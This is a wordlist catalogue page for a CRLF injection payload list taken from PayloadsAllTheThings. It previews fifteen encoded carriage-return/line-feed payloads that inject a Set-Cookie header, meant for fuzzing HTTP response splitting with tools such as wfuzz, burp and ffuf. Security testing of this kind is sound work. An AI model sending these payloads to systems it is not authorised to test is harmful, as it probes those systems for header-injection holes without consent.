Skip to content
Fuzzing588 B

CRLF Injection (PayloadsAllTheThings)

CRLF injection payloads using various encodings of carriage-return/line-feed to inject a Set-Cookie header. For testing HTTP response splitting and header injection.

View source
Size
588 B
Category
Fuzzing
Source
swisskyrepo/PayloadsAllTheThings
License
MIT
Recommended tools
wfuzzburpffuf

Preview

First 15 entries. Download or copy the full list (588 B) using the buttons above.

>head crlf-injection-patt.txt588 B
/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:crlf=injection
/%23%0aSet-Cookie:crlf=injection
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%3f%0d%0aSet-Cookie:crlf=injection

CRLF injection payloads using various encodings of carriage-return/line-feed to inject a Set-Cookie header. For testing HTTP response splitting and header injection.

This list is geared toward input fuzzing and vulnerability discovery. It contains roughly 588 B and pairs well with tools such as wfuzz, burp, ffuf. Pick the smallest list that fits your engagement: shorter lists are faster and quieter for online attacks, while larger lists give broader coverage for offline work where speed is less of a constraint.

You can copy the sample preview straight from this page, copy the entire list to your clipboard, or download the raw .txt file. The full list is served directly from its upstream source on GitHub.

Sourced from swisskyrepo/PayloadsAllTheThings and distributed under MIT. Only use wordlists against systems you are explicitly authorized to test.